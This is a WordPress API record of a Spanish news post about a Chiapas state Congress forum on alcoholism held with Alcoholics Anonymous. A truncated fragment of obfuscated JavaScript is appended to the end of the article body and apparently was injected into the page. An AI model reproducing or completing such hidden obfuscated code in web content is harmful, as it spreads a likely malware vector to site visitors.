{"id":8364,"date":"2023-01-27T03:05:41","date_gmt":"2023-01-27T03:05:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8364"},"modified":"2023-01-27T03:05:42","modified_gmt":"2023-01-27T03:05:42","slug":"congreso-del-estado-lleva-a-cabo-foro-sobre-alcoholismo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8364","title":{"rendered":"Congreso del Estado lleva a cabo Foro sobre Alcoholismo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"491\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230126-WA0086-1024x491.jpg\" alt=\"\" class=\"wp-image-8365\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230126-WA0086-1024x491.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230126-WA0086-300x144.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230126-WA0086-768x368.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230126-WA0086.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 La diputada Ver\u00f3nica Alc\u00e1zar sostuvo que el Congreso se suma a los trabajos de prevenci\u00f3n y atenci\u00f3n para el tratamiento del alcoholismo y adicciones.<\/p>\n\n\n\n<p>\u2022 El evento se realiz\u00f3 como parte de la de la Semana Nacional \u201cCompartiendo Esfuerzos\u201d con el lema \u201cA.A. y los Medios de Comunicaci\u00f3n\u201d.<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas; 26 de enero de 2023.- Existe una sinergia entre el Gobierno del Estado y el Congreso para atender temas como el de salud, enfocado en la prevenci\u00f3n y atenci\u00f3n del problema social que representa el alcoholismo, el cual afecta a la sociedad, expres\u00f3 la diputada presidenta de la Comisi\u00f3n de Salud, Ver\u00f3nica Alc\u00e1zar Cordero, al realizarse el foro 28 de la Semana Nacional \u201cCompartiendo Esfuerzos\u201d con el lema \u201cA.A. y los Medios de Comunicaci\u00f3n\u201d.<\/p>\n\n\n\n<p>Hoy este gobierno que encabeza Rutilio Escand\u00f3n Cadenas, impulsa acciones dignas y a la vanguardia, respecto al tema de alcoholismo y adicciones, por lo que el Poder Legislativo y la Comisi\u00f3n de Salubridad y Asistencia que presido, en particular, estar\u00e1 dando lo mejor de s\u00ed para quienes m\u00e1s lo necesitan y a favor de los grupos vulnerables, por una mejor condici\u00f3n de vida, concluy\u00f3 la legisladora.<\/p>\n\n\n\n<p>La presidenta de la Mesa, Sonia Catalina \u00c1lvarez; llam\u00f3 a la unidad para afrontar esta problem\u00e1tica social, invit\u00f3 a escuchar a los alcoh\u00f3licos para poder reflexionar, debe de existir una concordancia en la responsabilidad conjunta entre autoridades, familia, y el sector salud, subray\u00f3 que se tiene que sensibilizar a la ciudadan\u00eda para para lograr el objetivo y as\u00ed evitar que el alcoholismo afecte a las y los chiapanecos.<\/p>\n\n\n\n<p>&nbsp;El director de salud mental y adicciones de la Secretar\u00eda de Salud del Estado, Jes\u00fas Valtierra Hern\u00e1ndez; hizo un reconocimiento a A.A. por ese cambio que logra a trav\u00e9s de su d\u00eda a d\u00eda para con la vida de miles de personas que sufren esta enfermedad, catalog\u00f3 que el trabajo que hacen, es por medio del amor.<\/p>\n\n\n\n<p>La diputada Roc\u00edo Cervantes Cancino, apunt\u00f3 que desde el Congreso se est\u00e1 protegiendo a la ciudadan\u00eda para que no ocurran m\u00e1s accidentes ni muertes, adelant\u00f3 que est\u00e1 en an\u00e1lisis una Iniciativa para atender este tema, por eso refrend\u00f3 su compromiso para con la comunidad de A.A.<\/p>\n\n\n\n<p>Felipe N. al hacer uso de la palabra extern\u00f3 que este programa cambia vidas, resalt\u00f3 que un alcoh\u00f3lico afecta a su familia y a quienes los rodea, por eso subray\u00f3 que la felicidad no est\u00e1 en el beber, invit\u00f3 a leer el libro azul de A.A. tambi\u00e9n hizo referencia sobre el da\u00f1o que causa el ser alcoh\u00f3lico.<\/p>\n\n\n\n<p>Asistieron los legisladores Carolina Zuarth Ramos, Cuauht\u00e9moc Hern\u00e1ndez G\u00f3mez, Sergio David Molina G\u00f3mez, Elizabeth Escobedo Morales, as\u00ed como representantes de grupos de doble AA. Al final, se hicieron entrega de reconocimientos de parte de la Central Mexicana de Servicios Generales de A.A. al Congreso de Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 La diputada Ver\u00f3nica Alc\u00e1zar sostuvo que el Congreso se suma a los trabajos de prevenci\u00f3n y atenci\u00f3n para el tratamiento del alcoholismo y adicciones. \u2022 El evento se realiz\u00f3 como parte de la de la Semana Nacional \u201cCompartiendo Esfuerzos\u201d con el lema \u201cA.A. y los Medios de Comunicaci\u00f3n\u201d. Tuxtla Guti\u00e9rrez, Chiapas; 26 de enero &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8365,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-8364","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8364","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8364"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8364\/revisions"}],"predecessor-version":[{"id":8366,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8364\/revisions\/8366"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8365"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8364"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8364"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8364"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}